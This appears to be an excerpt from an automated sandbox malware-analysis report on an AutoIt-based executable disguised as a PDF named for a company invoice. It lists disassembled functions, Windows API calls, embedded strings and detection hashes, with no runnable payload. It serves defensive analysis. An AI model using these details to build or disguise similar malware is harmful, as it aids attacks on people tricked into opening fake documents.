                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                                      • Instruction ID: 5929bcbe14cb47bef045c3d0c18237c3e1c9010939164d267bc6ccedf9c262b1
                                                                                                                      • Opcode Fuzzy Hash: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                                      • Instruction Fuzzy Hash: F6A0113000020CABCA002B8AEC08888BFACEA002A0B008022F80E800228B32A8208A88
                                                                                                                      Function 00768A0E Relevance: .6, Instructions: 608COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                                                                                                                      • Instruction ID: a2a2225215214c7a9b92a0fabe720e89596c33d2e80138d09aabfa90753c6567
                                                                                                                      • Opcode Fuzzy Hash: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                                                                                                                      • Instruction Fuzzy Hash: 56223970A01615CBDF688F24C49467D77A1FB82304F6887AADC579B291EB3C9D81CB72
                                                                                                                      Function 00772405 Relevance: .3, Instructions: 345COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction ID: d262c96590bf8bd5206a3f2133eec8801aa44f2a1891e442f81f60ba7efc6b3e
                                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction Fuzzy Hash: 2FC1C4322061930ADF2D4A3D943503EBAE15EA27F135A8B5DE4BBCB4C5EF28D525D720
                                                                                                                      Function 0077283A Relevance: .3, Instructions: 341COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction ID: 468aa242a37ea7c9dbc16326b1b1af8f29312825a6a4f0692cbc85e7f29753ec
                                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction Fuzzy Hash: 7EC1E53220519309DF2D4A3E843003EBBE15BA27F135A8B6DE4BADB1D5EF28D525D720
                                                                                                                      Function 00771BB8 Relevance: .3, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction ID: 58dbc2762a7282d2135135d1f1f1a01be0815db9c484ea9573882629c6e9efc5
                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction Fuzzy Hash: 93C1963220619309DF2D4A3D943503EBBE15AA27F139A8B6DE4BBCB5C4EF18D524D720
                                                                                                                      Function 007C7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007C7B70
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007C7B82
                                                                                                                      • DestroyWindow.USER32 ref: 007C7B90
                                                                                                                      • GetDesktopWindow.USER32 ref: 007C7BAA
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007C7BB1
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007C7CF2
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007C7D02
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7D4A
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 007C7D56
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007C7D90
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DB2
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DC5
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DD0
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 007C7DD9
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DE8
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 007C7DF1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DF8
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 007C7E03
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7E15
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007E2CAC,00000000), ref: 007C7E2B
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 007C7E3B
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007C7E61
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007C7E80
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7EA2
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C808F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                      • Opcode ID: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                                                                                                                      • Instruction ID: ab5e49b72bfefc9d14f646e2224329ec25cfba1b36f336b2dcf0e157d0879262
                                                                                                                      • Opcode Fuzzy Hash: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                                                                                                                      • Instruction Fuzzy Hash: 4C024871900119EFDB14DFA4CC89EAE7BB9FB48310F14815DF916AB2A1DB78AD01CB60
                                                                                                                      Function 007D37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,007DF910), ref: 007D38AF
                                                                                                                      • IsWindowVisible.USER32(?), ref: 007D38D3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                      • API String ID: 4105515805-45149045
                                                                                                                      • Opcode ID: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
                                                                                                                      • Instruction ID: 8b01d9eeca92f1c706f21d8061b4509840a5f68ca0353cda3dde0d4a21ed69a0
                                                                                                                      • Opcode Fuzzy Hash: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
                                                                                                                      • Instruction Fuzzy Hash: 51D1B830204305DBCB14EF60C855A6E77B5EF94344F14845AF98A5B3E2DB79EE0ACB92
                                                                                                                      Function 007DA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 007DA89F
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 007DA8D0
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 007DA8DC
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 007DA8F6
                                                                                                                      • SelectObject.GDI32(?,?), ref: 007DA905
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA930
                                                                                                                      • GetSysColor.USER32(00000010), ref: 007DA938
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 007DA93F
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 007DA94E
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007DA955
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 007DA9A0
                                                                                                                      • FillRect.USER32(?,?,?), ref: 007DA9D2
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007DA9FD
                                                                                                                        • Part of subcall function 007DAB60: GetSysColor.USER32(00000012), ref: 007DAB99
                                                                                                                        • Part of subcall function 007DAB60: SetTextColor.GDI32(?,?), ref: 007DAB9D
                                                                                                                        • Part of subcall function 007DAB60: GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                                                                                                                        • Part of subcall function 007DAB60: GetSysColor.USER32(0000000F), ref: 007DABBE
                                                                                                                        • Part of subcall function 007DAB60: GetSysColor.USER32(00000011), ref: 007DABDB
                                                                                                                        • Part of subcall function 007DAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                                                                                                                        • Part of subcall function 007DAB60: SelectObject.GDI32(?,00000000), ref: 007DABFA
                                                                                                                        • Part of subcall function 007DAB60: SetBkColor.GDI32(?,00000000), ref: 007DAC03
                                                                                                                        • Part of subcall function 007DAB60: SelectObject.GDI32(?,?), ref: 007DAC10
                                                                                                                        • Part of subcall function 007DAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                                                                                                                        • Part of subcall function 007DAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                                                                                                                        • Part of subcall function 007DAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4124339563-0
                                                                                                                      • Opcode ID: d13716cf44e682573e2ba508c997f654ebca100e69dd2c596038a503a04dcd53
                                                                                                                      • Instruction ID: 840342510be62a740a33ea2eb94c11e809ac3914ffaf7bdc633036a494e6f197
                                                                                                                      • Opcode Fuzzy Hash: d13716cf44e682573e2ba508c997f654ebca100e69dd2c596038a503a04dcd53
                                                                                                                      • Instruction Fuzzy Hash: 91A19D72009305FFD7119F64DC08A6B7BB9FF88321F148A2AF963962A0D739D944CB56
                                                                                                                      Function 00752C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?), ref: 00752CA2
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00752CE8
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00752CF3
                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00752CFE
                                                                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00752D09
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0078C68B
                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0078C6C4
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0078CAED
                                                                                                                        • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 0078CB2A
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0078CB41
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078CB57
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078CB62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                      • Opcode ID: 7b31b49549b8a2557c661cb8f17950815cf1ca586da7d0dcf7981a53544480df
                                                                                                                      • Instruction ID: 21f361f9a3de36c582f28299475abc23eb310aecbc6ce53631f927c8fb127691
                                                                                                                      • Opcode Fuzzy Hash: 7b31b49549b8a2557c661cb8f17950815cf1ca586da7d0dcf7981a53544480df
                                                                                                                      • Instruction Fuzzy Hash: 9412C030240201EFDB16EF24C888BA9B7F5BF05311F548569E986DB662CB79EC46CB61
                                                                                                                      Function 007C77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 007C77F1
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007C78B0
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007C78EE
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007C7900
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007C7946
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 007C7952
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007C7996
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007C79A5
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 007C79B5
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 007C79B9
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007C79C9
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C79D2
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 007C79DB
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007C7A07
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 007C7A1E
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007C7A59
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007C7A6D
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 007C7A7E
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007C7AAE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 007C7AB9
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007C7AC4
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007C7ACE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                                                                                                                      • Instruction ID: e53165a38689146095d70d65ad3a15d6337dd2f3573e39b392610ccea0ab1c7e
                                                                                                                      • Opcode Fuzzy Hash: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                                                                                                                      • Instruction Fuzzy Hash: 1CA152B1A40219FFEB149B64DC4AFAA7BB9EF44710F048119FA15A72E0D7B4AD10CB64
                                                                                                                      Function 007BAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BAF89
                                                                                                                      • GetDriveTypeW.KERNEL32(?,007DFAC0,?,\\.\,007DF910), ref: 007BB066
                                                                                                                      • SetErrorMode.KERNEL32(00000000,007DFAC0,?,\\.\,007DF910), ref: 007BB1C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                                                                                                                      • Instruction ID: f10a289127fd7185805b80f40e641ae034fe766e1d24b0a37beed13fd82ecb9e
                                                                                                                      • Opcode Fuzzy Hash: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                                                                                                                      • Instruction Fuzzy Hash: 6751803068430DEACB18EB28CD96AFD73B1FB543417208015EC6AE72D1D7AD9D46DB52
                                                                                                                      Function 00756A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: 7bca660fa5059cf1eddb3e2f3f75006e00a17f595bd3d16dd4b9c06a8661cabe
                                                                                                                      • Instruction ID: 70b0ff21b95c7103c137bcda7120331197cac10e4a444329b391683776af94e5
